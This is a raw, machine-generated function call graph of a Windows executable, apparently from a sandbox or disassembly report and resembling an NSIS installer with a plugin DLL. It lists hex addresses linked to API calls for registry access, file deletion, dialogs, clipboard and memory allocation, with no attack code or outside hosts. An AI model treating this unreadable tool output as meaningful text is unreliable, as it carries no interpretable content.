4034d0 4369 4034dd 4342->4369 4463 406c2f lstrcpynW 4342->4463 4344 4034f3 4464 406e25 lstrlenW 4344->4464 4348 403504 GetFileSize 4349 40360b 4348->4349 4367 40351d 4348->4367 4350 4033e9 36 API calls 4349->4350 4351 403616 4350->4351 4353 40364f GlobalAlloc 4351->4353 4351->4369 4469 403131 SetFilePointer 4351->4469 4352 40311b ReadFile 4352->4367 4357 403667 4353->4357 4354 4036a4 4355 4033e9 36 API calls 4354->4355 4355->4369 4359 406b6b 2 API calls 4357->4359 4358 403633 4360 406a5d ReadFile 4358->4360 4362 403676 CreateFileW 4359->4362 4363 403645 4360->4363 4361 4033e9 36 API calls 4361->4367 4364 4036be 4362->4364 4362->4369 4363->4353 4363->4369 4470 403131 SetFilePointer 4364->4470 4366 4036cc 4368 4032c7 48 API calls 4366->4368 4367->4349 4367->4352 4367->4354 4367->4361 4367->4369 4368->4369 4369->4269 4371 4069fb 5 API calls 4370->4371 4372 405b55 4371->4372 4373 405b70 4372->4373 4374 405b5e 4372->4374 4375 406a8c 3 API calls 4373->4375 4479 406734 wsprintfW 4374->4479 4376 405b9f 4375->4376 4378 405bbe lstrcatW 4376->4378 4380 406a8c 3 API calls 4376->4380 4379 405b6e 4378->4379 4471 405a82 4379->4471 4380->4378 4383 40674d 18 API calls 4384 405bf0 4383->4384 4385 405c8a 4384->4385 4387 406a8c 3 API calls 4384->4387 4386 40674d 18 API calls 4385->4386 4388 405c90 4386->4388 4389 405c23 4387->4389 4390 405ca0 LoadImageW 4388->4390 4391 405fbd 21 API calls 4388->4391 4389->4385 4394 405c47 lstrlenW 4389->4394 4398 40670b CharNextW 4389->4398 4392 405cd0 RegisterClassW 4390->4392 4393 405d4d 4390->4393 4391->4390 4395 405d04 SystemParametersInfoW CreateWindowExW 4392->4395 4426 405cfd 4392->4426 4396 401533 102 API calls 4393->4396 4399 405c57 lstrcmpiW 4394->4399 4400 405c7d 4394->4400 4395->4393 4397 405d53 4396->4397 4404 405a82 22 API calls 4397->4404 4397->4426 4402 405c42 4398->4402 4399->4400 4403 405c67 GetFileAttributesW 4399->4403 4401 40666b 3 API calls 4400->4401 4405 405c83 4401->4405 4402->4394 4406 405c73 4403->4406 4408 405d60 4404->4408 4480 406c2f lstrcpynW 4405->4480 4406->4400 4407 406e25 2 API calls 4406->4407 4407->4400 4410 405d6c ShowWindow 4408->4410 4411 405dee 4408->4411 4413 4062b3 3 API calls 4410->4413 4412 405967 105 API calls 4411->4412 4414 405df4 4412->4414 4415 405d84 4413->4415 4416 405e12 4414->4416 4417 405df8 4414->4417 4418 405d92 GetClassInfoW 4415->4418 4419 4062b3 3 API calls 4415->4419 4420 401533 102 API calls 4416->4420 4423 401533 102 API calls 4417->4423 4417->4426 4421 405da5 GetClassInfoW RegisterClassW 4418->4421 4422 405dbb DialogBoxParamW 4418->4422 4419->4418 4424 405e19 4420->4424 4421->4422 4425 401533 102 API calls 4422->4425 4423->4426 4424->4424 4425->4426 4426->4278 4427->4260 4485 406c2f lstrcpynW 4428->4485 4430 40675e 4431 406cda 4 API calls 4430->4431 4432 406764 4431->4432 4433 403b8d 4432->4433 4434 406e52 5 API calls 4432->4434 4433->4278 4443 406c2f lstrcpynW 4433->4443 4436 406770 4434->4436 4435 4067a0 lstrlenW 4435->4436 4437 4067ac 4435->4437 4436->4433 4436->4435 4439 4066e4 2 API calls 4436->4439 4442 406e25 2 API calls 4436->4442 4438 40666b 3 API calls 4437->4438 4440 4067b1 GetFileAttributesW 4438->4440 4439->4436 4440->4433 4441 4067bd 4440->4441 4441->4433 4442->4435 4443->4307 4444->4313 4446 4037da 4445->4446 4447 4037cc CloseHandle 4445->4447 4448 4037f2 4446->4448 4449 4037e4 CloseHandle 4446->4449 4447->4446 4486 403e16 4448->4486 4449->4448 4454->4314 4455->4325 4457 40682a 4456->4457 4458 40681e CloseHandle 4456->4458 4457->4325 4458->4457 4460 401399 102 API calls 4459->4460 4461 401547 4460->4461 4461->4284 4462->4342 4463->4344 4465 406e34 4464->4465 4466 4034f9 4465->4466 4467 406e3a CharPrevW 4465->4467 4468 406c2f lstrcpynW 4466->4468 4467->4465 4467->4466 4468->4348 4469->4358 4470->4366 4472 405a95 4471->4472 4481 406734 wsprintfW 4472->4481 4474 405b0e 4482 405e1e 4474->4482 4476 405b3c 4476->4383 4477 405b13 4477->4476 4478 405fbd 21 API calls 4477->4478 4478->4477 4479->4379 4480->4385 4481->4474 4483 405fbd 21 API calls 4482->4483 4484 405e2c SetWindowTextW 4483->4484 4484->4477 4485->4430 4487 403e24 4486->4487 4488 4037f7 4487->4488 4489 403e29 FreeLibrary GlobalFree 4487->4489 4490 40682e 4488->4490 4489->4488 4489->4489 4491 40674d 18 API calls 4490->4491 4492 406850 4491->4492 4493 406870 4492->4493 4494 406859 DeleteFileW 4492->4494 4495 403803 OleUninitialize 4493->4495 4497 406990 4493->4497 4529 406c2f lstrcpynW 4493->4529 4494->4495 4495->4281 4495->4282 4497->4495 4499 4066e4 2 API calls 4497->4499 4498 406898 4500 4068b0 4498->4500 4501 4068a2 lstrcatW 4498->4501 4502 4069ad 4499->4502 4504 406e25 2 API calls 4500->4504 4503 4068b6 4501->4503 4502->4495 4506 4069b1 4502->4506 4505 4068c7 lstrcatW 4503->4505 4507 4068cf lstrlenW FindFirstFileW 4503->4507 4504->4503 4505->4507 4508 40666b 3 API calls 4506->4508 4507->4497 4517 4068f8 4507->4517 4509 4069b7 4508->4509 4510 40669a 5 API calls 4509->4510 4511 4069c3 4510->4511 4513 4069e6 4511->4513 4514 4069c7 4511->4514 4512 406972 FindNextFileW 4512->4517 4518 406989 FindClose 4512->4518 4516 405e3d 28 API calls 4513->4516 4514->4495 4519 405e3d 28 API calls 4514->4519 4516->4495 4517->4512 4523 40682e 63 API calls 4517->4523 4524 40693e 4517->4524 4530 406c2f lstrcpynW 4517->4530 4518->4497 4521 4069d3 4519->4521 4522 406352 39 API calls 4521->4522 4525 4069dc 4522->4525 4523->4524 4524->4512 4526 405e3d 28 API calls 4524->4526 4527 405e3d 28 API calls 4524->4527 4528 406352 39 API calls 4524->4528 4531 40669a 4524->4531 4525->4495 4526->4512 4527->4524 4528->4524 4529->4498 4530->4517 4532 406cb2 2 API calls 4531->4532 4533 4066a6 4532->4533 4534 4066b6 RemoveDirectoryW 4533->4534 4535 4066be DeleteFileW 4533->4535 4536 4066c8 4533->4536 4537 4066c4 4534->4537 4535->4537 4536->4524 4537->4536 4538 4066d3 SetFileAttributesW 4537->4538 4538->4536 5238 401c04 5239 403002 21 API calls 5238->5239 5240 401c0e 5239->5240 5241 403002 21 API calls 5240->5241 5242 401bb2 5241->5242 5243 401b88 5244 40303e 21 API calls 5243->5244 5245 401b8f 5244->5245 5246 40303e 21 API calls 5245->5246 5247 401b98 5246->5247 5248 401ba0 lstrcmpiW 5247->5248 5249 401ba8 lstrcmpW 5247->5249 5250 401bae 5248->5250 5249->5250 5251 404188 5252 4041c5 5251->5252 5253 4041af 5251->5253 5255 4041cf GetDlgItem 5252->5255 5262 404242 5252->5262 5312 406b4f GetDlgItemTextW 5253->5312 5257 4041e7 5255->5257 5256 4041ba 5259 406e52 5 API calls 5256->5259 5263 4041fb SetWindowTextW 5257->5263 5267 406cda 4 API calls 5257->5267 5258 404261 5260 4041c0 5258->5260 5314 406b4f GetDlgItemTextW 5258->5314 5259->5260 5271 40585e 8 API calls 5260->5271 5262->5258 5266 405fbd 21 API calls 5262->5266 5265 40561d 22 API calls 5263->5265 5264 404358 5268 40674d 18 API calls 5264->5268 5269 404218 5265->5269 5270 4042bd SHBrowseForFolderW 5266->5270 5272 4041f1 5267->5272 5273 40435e 5268->5273 5274 40561d 22 API calls 5269->5274 5270->5258 5275 4042d8 CoTaskMemFree 5270->5275 5276 404519 5271->5276 5272->5263 5277 40666b 3 API calls 5272->5277 5315 406c2f lstrcpynW 5273->5315 5279 404223 5274->5279 5280 40666b 3 API calls 5275->5280 5277->5263 5313 405606 SendMessageW 5279->5313 5283 4042e5 5280->5283 5281 404378 5284 4069fb 5 API calls 5281->5284 5286 404322 SetDlgItemTextW 5283->5286 5289 405fbd 21 API calls 5283->5289 5295 40437e 5284->5295 5285 404229 5287 4069fb 5 API calls 5285->5287 5286->5258 5287->5260 5288 4043d3 5316 406c2f lstrcpynW 5288->5316 5291 404303 lstrcmpiW 5289->5291 5291->5286 5293 404317 lstrcatW 5291->5293 5292 4043df 5294 406cda 4 API calls 5292->5294 5293->5286 5296 4043e5 GetDiskFreeSpaceW 5294->5296 5295->5288 5298 406e25 2 API calls 5295->5298 5300 40442d 5295->5300 5299 40440d MulDiv 5296->5299 5296->5300 5298->5295 5299->5300 5301 4044a4 5300->5301 5317 405663 5300->5317 5302 4044cc EnableWindow 5301->5302 5304 401533 102 API calls 5301->5304 5302->5260 5305 4044f5 5302->5305 5307 4044ca 5304->5307 5305->5260 5325 40563f SendMessageW 5305->5325 5306 40448c 5308 404490 5306->5308 5309 4044a6 SetDlgItemTextW 5306->5309 5307->5302 5311 405663 24 API calls 5308->5311 5309->5301 5311->5301 5312->5256 5313->5285 5314->5264 5315->5281 5316->5292 5318 405678 5317->5318 5319 405fbd 21 API calls 5318->5319 5320 405701 5319->5320 5321 405fbd 21 API calls 5320->5321 5322 40570d 5321->5322 5323 405fbd 21 API calls 5322->5323 5324 405719 lstrlenW wsprintfW SetDlgItemTextW 5323->5324 5324->5306 5325->5260 4656 7031167a 4657 703116b7 4656->4657 4698 70312351 4657->4698 4659 703116be 4660 703117ef 4659->4660 4661 703116d6 4659->4661 4662 703116cf 4659->4662 4728 70312049 4661->4728 4744 70311fcb 4662->4744 4667 70311740 4673 70311791 4667->4673 4674 70311746 4667->4674 4668 70311722 4757 70312209 4668->4757 4669 703116eb 4672 703116f5 4669->4672 4677 70311702 4669->4677 4670 7031170a 4683 70311700 4670->4683 4754 70312f9f 4670->4754 4672->4683 4738 70312d14 4672->4738 4675 70312209 10 API calls 4673->4675 4776 70311f1e 4674->4776 4681 7031177e 4675->4681 4676 70311728 4768 70311668 4676->4768 4748 703117f7 4677->4748 4689 703117de 4681->4689 4781 7031200d 4681->4781 4683->4667 4683->4668 4687 70311708 4687->4683 4688 70312209 10 API calls 4688->4681 4689->4660 4693 703117e8 GlobalFree 4689->4693 4693->4660 4695 703117cf 4695->4689 4785 703115c5 wsprintfW 4695->4785 4696 703117c2 FreeLibrary 4696->4695 4788 703112f8 GlobalAlloc 4698->4788 4700 7031237f 4789 703112f8 GlobalAlloc 4700->4789 4702 70312a3a GlobalFree GlobalFree GlobalFree 4703 70312a5a 4702->4703 4717 70312aa7 4702->4717 4704 70312af7 4703->4704 4710 70312a73 4703->4710 4703->4717 4705 70312b19 GetModuleHandleW 4704->4705 4704->4717 4707 70312b2a LoadLibraryW 4705->4707 4708 70312b3f 4705->4708 4706 70312947 GlobalAlloc 4722 7031238a 4706->4722 4707->4708 4707->4717 4796 70311f7b WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4708->4796 4714 703112e1 2 API calls 4710->4714 4710->4717 4711 7031299f lstrcpyW 4711->4722 4712 703129bd GlobalFree 4712->4722 4713 70312b8e 4716 70312b9c lstrlenW 4713->4716 4713->4717 4714->4717 4715 703129af lstrcpyW 4715->4722 4797 70311f7b WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4716->4797 4717->4659 4718 70312b4c 4718->4713 4726 70312b78 GetProcAddress 4718->4726 4721 70312bb6 4721->4717 4722->4702 4722->4706 4722->4711 4722->4712 4722->4715 4723 70312822 GlobalFree 4722->4723 4725 703129fb 4722->4725 4790 703112f8 GlobalAlloc 4722->4790 4791 703112e1 4722->4791 4723->4722 4725->4722 4794 70311309 GlobalSize GlobalAlloc 4725->4794 4726->4713 4733 7031205e 4728->4733 4730 70312124 GlobalAlloc WideCharToMultiByte 4732 703121be GlobalFree 4730->4732 4731 70312154 GlobalAlloc CLSIDFromString 4731->4733 4732->4733 4734 703116dc 4732->4734 4733->4730 4733->4731 4733->4732 4735 703112e1 lstrcpynW GlobalAlloc 4733->4735 4736 7031208b 4733->4736 4734->4669 4734->4670 4734->4683 4735->4733 4736->4732 4736->4733 4799 70311548 4736->4799 4804 703119db 4736->4804 4740 70312d26 4738->4740 4739 70312dcb VirtualAlloc 4743 70312de9 4739->4743 4740->4739 4807 70312cbf 4743->4807 4745 70311fde 4744->4745 4746 703116d5 4745->4746 4747 70311fe9 GlobalAlloc 4745->4747 4746->4661 4747->4745 4753 70311823 4748->4753 4749 70311897 GlobalAlloc 4752 703118b5 4749->4752 4750 703118a8 4751 703118ac GlobalSize 4750->4751 4750->4752 4751->4752 4752->4687 4753->4749 4753->4750 4755 70312faa 4754->4755 4756 70312fea GlobalFree 4755->4756 4810 703112f8 GlobalAlloc 4757->4810 4759 70312280 MultiByteToWideChar 4766 70312211 4759->4766 4760 703122b7 lstrcpynW 4760->4766 4761 703122a6 StringFromGUID2 4761->4766 4762 703122ca wsprintfW 4762->4766 4763 703122ee GlobalFree 4763->4766 4764 70312325 GlobalFree 4764->4676 4765 703115eb 2 API calls 4765->4766 4766->4759 4766->4760 4766->4761 4766->4762 4766->4763 4766->4764 4766->4765 4811 70311638 4766->4811 4815 703112f8 GlobalAlloc 4768->4815 4770 7031166d 4771 70311f1e 2 API calls 4770->4771 4772 70311677 4771->4772 4773 703115eb 4772->4773 4774 70311633 GlobalFree 4773->4774 4775 703115f4 GlobalAlloc lstrcpynW 4773->4775 4774->4681 4775->4774 4777 70311f2b wsprintfW 4776->4777 4778 70311f5c lstrcpyW 4776->4778 4780 70311765 4777->4780 4778->4780 4780->4688 4782 703117a4 4781->4782 4783 7031201c 4781->4783 4782->4695 4782->4696 4783->4782 4784 70312033 GlobalFree 4783->4784 4784->4783 4786 703115eb 2 API calls 4785->4786 4787 703115e6 4786->4787 4787->4689 4788->4700 4789->4722 4790->4722 4798 703112f8 GlobalAlloc 4791->4798 4793 703112f0 lstrcpynW 4793->4722 4795 70311327 4794->4795 4795->4725 4796->4718 4797->4721 4798->4793 4800 70311555 4799->4800 4801 703112f8 GlobalAlloc 4799->4801 4802 703112e1 2 API calls 4800->4802 4801->4736 4803 7031156a 4802->4803 4803->4736 4805 70311a48 4804->4805 4806 703119ea VirtualAlloc 4804->4806 4805->4736 4806->4805 4808 70312ccd GetLastError 4807->4808 4809 70312cd8 4807->4809 4808->4809 4809->4683 4810->4766 4812 70311663 4811->4812 4813 7031163f 4811->4813 4812->4766 4813->4812 4814 70311648 lstrcpyW 4813->4814 4814->4812 4815->4770 5326 403e8d 5327 403ea2 5326->5327 5328 403fc7 5326->5328 5332 40561d 22 API calls 5327->5332 5329 403fd5 5328->5329 5330 404048 5328->5330 5336 404002 GetDlgItem SendMessageW EnableWindow 5329->5336 5345 404043 5329->5345 5331 404053 GetDlgItem 5330->5331 5330->5345 5334 404075 5331->5334 5338 404116 5331->5338 5335 403f11 5332->5335 5333 40585e 8 API calls 5348 40415b 5333->5348 5341 4040a5 SendMessageW LoadCursorW SetCursor 5334->5341 5334->5345 5337 40561d 22 API calls 5335->5337 5355 40563f SendMessageW 5336->5355 5342 403f20 CheckDlgButton EnableWindow GetDlgItem 5337->5342 5339 404127 5338->5339 5338->5345 5343 404146 5339->5343 5344 40412f SendMessageW 5339->5344 5356 406b08 ShellExecuteExW 5341->5356 5354 405606 SendMessageW 5342->5354 5343->5348 5349 40414b SendMessageW 5343->5349 5344->5343 5345->5333 5349->5348 5350 404108 LoadCursorW SetCursor 5350->5338 5351 403f53 SendMessageW 5352 403f78 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5351->5352 5353 403f6f GetSysColor 5351->5353 5352->5348 5353->5352 5354->5351 5355->5345 5356->5350 5357 401e8e 5358 403002 21 API calls 5357->5358 5359 401e94 IsWindow 5358->5359 5360 401bb2 5359->5360 5361 40578f lstrlenW WideCharToMultiByte 4552 405095 4553 4050b4 4552->4553 4554 405236 4552->4554 4553->4554 4555 4050c0 4553->4555 4556 40524a GetDlgItem GetDlgItem 4554->4556 4561 405283 4554->4561 4558 4050c5 SetWindowPos 4555->4558 4559 4050df 4555->4559 4560 40561d 22 API calls 4556->4560 4557 4052da 4563 4055eb SendMessageW 4557->4563 4578 405231 4557->4578 4562 405222 4558->4562 4564 405132 4559->4564 4565 4050e4 ShowWindow 4559->4565 4566 40526d SetClassLongW 4560->4566 4561->4557 4567 401399 102 API calls 4561->4567 4573 40585e 8 API calls 4562->4573 4598 4052ec 4563->4598 4569 405154 4564->4569 4570 40513a DestroyWindow 4564->4570 4565->4562 4568 405109 GetWindowLongW 4565->4568 4571 401533 102 API calls 4566->4571 4572 4052b3 4567->4572 4568->4562 4574 405125 ShowWindow 4568->4574 4576 405159 SetWindowLongW 4569->4576 4577 40516c 4569->4577 4575 40556b 4570->4575 4571->4561 4572->4557 4579 4052b7 SendMessageW 4572->4579 4573->4578 4574->4562 4575->4578 4585 40559e ShowWindow 4575->4585 4576->4578 4577->4562 4582 405178 GetDlgItem 4577->4582 4579->4578 4580 401533 102 API calls 4580->4598 4581 40556d DestroyWindow EndDialog 4581->4575 4583 405194 SendMessageW IsWindowEnabled 4582->4583 4584 4051b7 4582->4584 4583->4578 4586 4051b3 4583->4586 4588 4051c6 4584->4588 4591 405209 SendMessageW 4584->4591 4592 4051d8 4584->4592 4599 4051be 4584->4599 4585->4578 4586->4584 4587 405fbd 21 API calls 4587->4598 4588->4591 4588->4599 4589 40561d 22 API calls 4589->4598 4590 405a5b SendMessageW 4593 405207 4590->4593 4591->4562 4594 4051e1 4592->4594 4595 4051ef 4592->4595 4593->4562 4596 401533 102 API calls 4594->4596 4597 401533 102 API calls 4595->4597 4596->4599 4600 4051f6 4597->4600 4598->4578 4598->4580 4598->4581 4598->4587 4598->4589 4601 40561d 22 API calls 4598->4601 4614 4054ad DestroyWindow 4598->4614 4599->4590 4600->4562 4600->4599 4602 405370 GetDlgItem 4601->4602 4603 405397 ShowWindow KiUserCallbackDispatcher KiUserCallbackDispatcher EnableWindow 4602->4603 4607 40538b 4602->4607 4603->4607 4604 4053ec GetSystemMenu EnableMenuItem SendMessageW 4605 405419 SendMessageW 4604->4605 4604->4607 4605->4607 4607->4603 4607->4604 4608 405e1e 22 API calls 4607->4608 4623 405606 SendMessageW 4607->4623 4624 406c2f lstrcpynW 4607->4624 4608->4607 4610 40544b lstrlenW 4611 405fbd 21 API calls 4610->4611 4612 405465 SetWindowTextW 4611->4612 4613 401399 102 API calls 4612->4613 4613->4598 4614->4575 4615 4054c7 CreateDialogParamW 4614->4615 4615->4575 4616 4054fa 4615->4616 4617 40561d 22 API calls 4616->4617 4618 405505 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4617->4618 4619 401399 102 API calls 4618->4619 4620 40554b 4619->4620 4620->4578 4621 405553 ShowWindow 4620->4621 4622 4055eb SendMessageW 4621->4622 4622->4575 4623->4607 4624->4610 5362 70312c6a 5363 70312cc3 5362->5363 5364 70312cd8 5362->5364 5363->5364 5365 70312ccd GetLastError 5363->5365 5365->5364 5366 40211b 5367 40303e 21 API calls 5366->5367 5368 402121 5367->5368 5369 405e3d 28 API calls 5368->5369 5370 40212b 5369->5370 5371 4067eb 2 API calls 5370->5371 5372 402131 5371->5372 5373 401709 5372->5373 5374 406629 5 API calls 5372->5374 5377 40215b 5372->5377 5376 40214b 5374->5376 5375 402110 CloseHandle 5375->5373 5376->5377 5379 406734 wsprintfW 5376->5379 5377->5373 5377->5375 5379->5377 4846 40291d 4847 403002 21 API calls 4846->4847 4854 40292e 4847->4854 4848 402aa2 SetFilePointer 4849 402aee 4851 402980 ReadFile 4851->4848 4851->4854 4852 406a5d ReadFile 4852->4854 4853 402a3d 4853->4848 4853->4854 4860 406599 SetFilePointer 4853->4860 4854->4848 4854->4849 4854->4851 4854->4852 4854->4853 4855 402ae4 4854->4855 4856 4029c5 MultiByteToWideChar 4854->4856 4859 4029f6 SetFilePointer MultiByteToWideChar 4854->4859 4869 406734 wsprintfW 4855->4869 4856->4854 4859->4854 4861 4065b5 4860->4861 4864 4065d0 4860->4864 4862 406a5d ReadFile 4861->4862 4863 4065c1 4862->4863 4863->4864 4865 406601 SetFilePointer 4863->4865 4866 4065d9 SetFilePointer 4863->4866 4864->4853 4865->4864 4866->4865 4867 4065e4 4866->4867 4868 406b20 WriteFile 4867->4868 4868->4864 4869->4849 5380 40219d 5381 40303e 21 API calls 5380->5381 5382 4021a4 5381->5382 5383 4069fb 5 API calls 5382->5383 5384 4021b5 5383->5384 5385 402ea5 5384->5385 5386 4021ce GlobalAlloc 5384->5386 5386->5385 5387 4021e3 5386->5387 5388 4069fb 5 API calls 5387->5388 5389 4021ea 5388->5389 5390 4069fb 5 API calls 5389->5390 5392 4021f3 5390->5392 5391 40224e GlobalFree 5391->5385 5392->5391 5397 406734 wsprintfW 5392->5397 5394 402237 5398 406734 wsprintfW 5394->5398 5396 40224c 5396->5391 5397->5394 5398->5396 5399 401aa1 5400 401aa2 5399->5400 5401 40303e 21 API calls 5400->5401 5402 401aa7 5401->5402 5403 40682e 70 API calls 5402->5403 5404 401ab1 5403->5404 5405 404521 GetDlgItem GetDlgItem 5406 404575 7 API calls 5405->5406 5411 40479b 5405->5411 5407 404618 DeleteObject 5406->5407 5408 40460b SendMessageW 5406->5408 5410 404627 5407->5410 5408->5407 5409 4048d2 5412 404917 5409->5412 5413 4049ac 5409->5413 5416 405fbd 21 API calls 5410->5416 5417 404665 5410->5417 5411->5409 5423 4057dd 5 API calls 5411->5423 5436 40482d 5411->5436 5418 404a01 5412->5418 5419 404936 SendMessageW 5412->5419 5414 4049d7 5413->5414 5415 4049bb SendMessageW 5413->5415 5421 4049e1 5414->5421 5434 404a17 5414->5434 5415->5418 5424 40463d SendMessageW SendMessageW 5416->5424 5425 40561d 22 API calls 5417->5425 5422 40585e 8 API calls 5418->5422 5419->5418 5427 404953 SendMessageW 5419->5427 5420 4048ba SendMessageW 5420->5409 5428 4049f1 5421->5428 5429 4049ea ImageList_Destroy 5421->5429 5430 404c29 5422->5430 5423->5436 5424->5410 5426 40467d 5425->5426 5431 40561d 22 API calls 5426->5431 5432 40496c 5427->5432 5428->5418 5433 4049fa GlobalFree 5428->5433 5429->5428 5444 404689 5431->5444 5439 404982 SendMessageW 5432->5439 5433->5418 5438 404a4e 5434->5438 5443 4055b9 102 API calls 5434->5443 5452 404be0 5434->5452 5435 404bf7 ShowWindow GetDlgItem ShowWindow 5435->5418 5436->5409 5436->5420 5437 404768 GetWindowLongW SetWindowLongW 5440 40477e 5437->5440 5453 404a8c SendMessageW 5438->5453 5454 404aa6 5438->5454 5439->5434 5441 404795 5440->5441 5442 404785 ShowWindow 5440->5442 5458 405606 SendMessageW 5441->5458 5442->5441 5443->5438 5444->5437 5445 4046e1 SendMessageW 5444->5445 5447 404730 SendMessageW 5444->5447 5448 40471d SendMessageW 5444->5448 5449 404764 5444->5449 5445->5444 5447->5444 5448->5444 5449->5437 5449->5440 5450 404b96 5451 404bb2 InvalidateRect 5450->5451 5455 404bc1 5450->5455 5451->5455 5452->5418 5452->5435 5453->5454 5454->5450 5457 404b3c SendMessageW SendMessageW 5454->5457 5455->5452 5456 405663 24 API calls 5455->5456 5456->5452 5457->5454 5458->5411 5459 402728 5460 4030c1 21 API calls 5459->5460 5461 402732 5460->5461 5462 40303e 21 API calls 5461->5462 5463 40273b 5462->5463 5464 402748 RegQueryValueExW 5463->5464 5468 401709 5463->5468 5465 402772 5464->5465 5466 40276b 5464->5466 5467 40271c RegCloseKey 5465->5467 5465->5468 5466->5465 5470 406734 wsprintfW 5466->5470 5467->5468 5470->5465 5471 402b28 5472 402b2e 5471->5472 5473 402b36 FindClose 5472->5473 5474 402ea1 5472->5474 5473->5474 5475 4025ac 5476 40303e 21 API calls 5475->5476 5477 4025bd 5476->5477 5478 40303e 21 API calls 5477->5478 5479 4025c6 5478->5479 5480 40303e 21 API calls 5479->5480 5481 4025cf GetPrivateProfileStringW 5480->5481 5482 4025f4 5481->5482 5483 401ead 5484 403002 21 API calls 5483->5484 5485 401eb4 5484->5485 5486 403002 21 API calls 5485->5486 5487 401ebd GetDlgItem 5486->5487 3815 4027b0 3825 4030c1 3815->3825 3819 4027c3 3820 4027d5 3819->3820 3824 401709 3819->3824 3821 4027f0 RegEnumValueW 3820->3821 3822 4027e4 RegEnumKeyW 3820->3822 3823 40280e RegCloseKey 3821->3823 3822->3823 3823->3824 3833 40303e 3825->3833 3827 4030d9 3838 4063ed 3827->3838 3830 403002 3831 405fbd 21 API calls 3830->3831 3832 403016 3831->3832 3832->3819 3842 405fbd 3833->3842 3836 403076 3836->3827 3839 4063fc 3838->3839 3840 4027ba 3839->3840 3841 406405 RegOpenKeyExW 3839->3841 3840->3830 3841->3840 3843 405fc8 3842->3843 3844 406213 3843->3844 3848 4061de lstrlenW 3843->3848 3849 4060de GetSystemDirectoryW 3843->3849 3852 405fbd 15 API calls 3843->3852 3853 4060f4 GetWindowsDirectoryW 3843->3853 3854 405fbd 15 API calls 3843->3854 3856 406e52 5 API calls 3843->3856 3857 406189 lstrcatW 3843->3857 3858 406154 SHGetPathFromIDListW CoTaskMemFree 3843->3858 3868 406a8c 3843->3868 3873 4069fb GetModuleHandleA 3843->3873 3879 406734 wsprintfW 3843->3879 3880 406c2f lstrcpynW 3843->3880 3845 403067 3844->3845 3881 406c2f lstrcpynW 3844->3881 3845->3836 3859 406e52 3845->3859 3848->3843 3849->3843 3852->3848 3853->3843 3854->3843 3856->3843 3857->3843 3858->3843 3866 406e67 3859->3866 3860 406ee9 3861 406ef1 CharPrevW 3860->3861 3864 406f11 3860->3864 3861->3860 3862 406eda CharNextW 3862->3860 3862->3866 3864->3836 3865 406ec6 CharNextW 3865->3866 3866->3860 3866->3862 3866->3865 3867 406ed5 CharNextW 3866->3867 3885 40670b 3866->3885 3867->3862 3869 4063ed RegOpenKeyExW 3868->3869 3870 406aba 3869->3870 3871 406ac1 RegQueryValueExW RegCloseKey 3870->3871 3872 406af2 3870->3872 3871->3872 3872->3843 3874 406a13 3873->3874 3875 406a1d GetProcAddress 3873->3875 3882 4062b3 GetSystemDirectoryW 3874->3882 3876 406a2b 3875->3876 3876->3843 3878 406a19 3878->3875 3878->3876 3879->3843 3880->3843 3881->3845 3883 4062d5 wsprintfW LoadLibraryExW 3882->3883 3883->3878 3886 406731 3885->3886 3887 406717 3885->3887 3886->3866 3887->3886 3888 406720 CharNextW 3887->3888 3888->3886 3888->3887 3889 404c33 3890 404c50 GetDlgItem GetDlgItem GetDlgItem 3889->3890 3891 404ddc 3889->3891 3935 405606 SendMessageW 3890->3935 3893 404de4 GetDlgItem CreateThread CloseHandle 3891->3893 3894 404e28 3891->3894 3896 404e10 3893->3896 3969 405967 OleInitialize 3893->3969 3897 404e30 3894->3897 3898 404e59 3894->3898 3895 404cc9 3905 404cd0 GetClientRect GetSystemMetrics SendMessageW SendMessageW 3895->3905 3940 40585e 3896->3940 3897->3896 3899 404e3c ShowWindow ShowWindow 3897->3899 3900 404e61 3898->3900 3901 404ea7 3898->3901 3954 405606 SendMessageW 3899->3954 3904 404e7d ShowWindow 3900->3904 3906 404e6a 3900->3906 3901->3896 3910 404eba SendMessageW 3901->3910 3904->3906 3907 404e94 3904->3907 3908 404d20 SendMessageW SendMessageW 3905->3908 3909 404d34 3905->3909 3955 405a5b 3906->3955 3958 405e3d 3907->3958 3908->3909 3915 404d46 3909->3915 3916 404d3c SendMessageW 3909->3916 3911 404e1e 3910->3911 3912 404ed8 CreatePopupMenu 3910->3912 3918 405fbd 21 API calls 3912->3918 3936 40561d 3915->3936 3916->3915 3921 404eea AppendMenuW 3918->3921 3919 404e57 3919->3896 3920 404d58 3922 404d61 ShowWindow 3920->3922 3923 404d93 GetDlgItem SendMessageW 3920->3923 3924 404f20 TrackPopupMenu 3921->3924 3925 404f0c GetWindowRect 3921->3925 3926 404d82 3922->3926 3927 404d77 ShowWindow 3922->3927 3923->3911 3929 404dbf SendMessageW SendMessageW 3923->3929 3924->3911 3928 404f42 3924->3928 3925->3924 3939 405606 SendMessageW 3926->3939 3927->3926 3930 404f56 SendMessageW 3928->3930 3929->3911 3930->3930 3932 404f72 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3930->3932 3933 404f9e SendMessageW 3932->3933 3933->3933 3934 404fcc GlobalUnlock SetClipboardData CloseClipboard 3933->3934 3934->3911 3935->3895 3937 405fbd 21 API calls 3936->3937 3938 405628 SetDlgItemTextW 3937->3938 3938->3920 3939->3923 3941 40592c 3940->3941 3942 405876 GetWindowLongW 3940->3942 3941->3911 3942->3941 3943 40588b 3942->3943 3943->3941 3944 4058b3 GetSysColor 3943->3944 3945 4058bf 3943->3945 3944->3945 3946 4058c3 SetTextColor 3945->3946 3947 4058cd SetBkMode 3945->3947 3946->3947 3948 4058f5 3947->3948 3949 4058e6 GetSysColor 3947->3949 3950 405906 3948->3950 3951 4058f9 SetBkColor 3948->3951 3949->3948 3950->3941 3952 405916 DeleteObject 3950->3952 3953 40591f CreateBrushIndirect 3950->3953 3951->3950 3952->3953 3953->3941 3954->3919 3956 405a62 3955->3956 3957 405a68 SendMessageW 3955->3957 3956->3957 3957->3919 3959 405e4f 3958->3959 3967 405f05 3958->3967 3960 405e6e lstrlenW 3959->3960 3961 405fbd 21 API calls 3959->3961 3962 405e80 lstrlenW 3960->3962 3963 405ea3 3960->3963 3961->3960 3964 405e95 lstrcatW 3962->3964 3962->3967 3965 405eba 3963->3965 3966 405ead SetWindowTextW 3963->3966 3964->3963 3965->3967 3968 405ebf SendMessageW SendMessageW SendMessageW 3965->3968 3966->3965 3967->3906 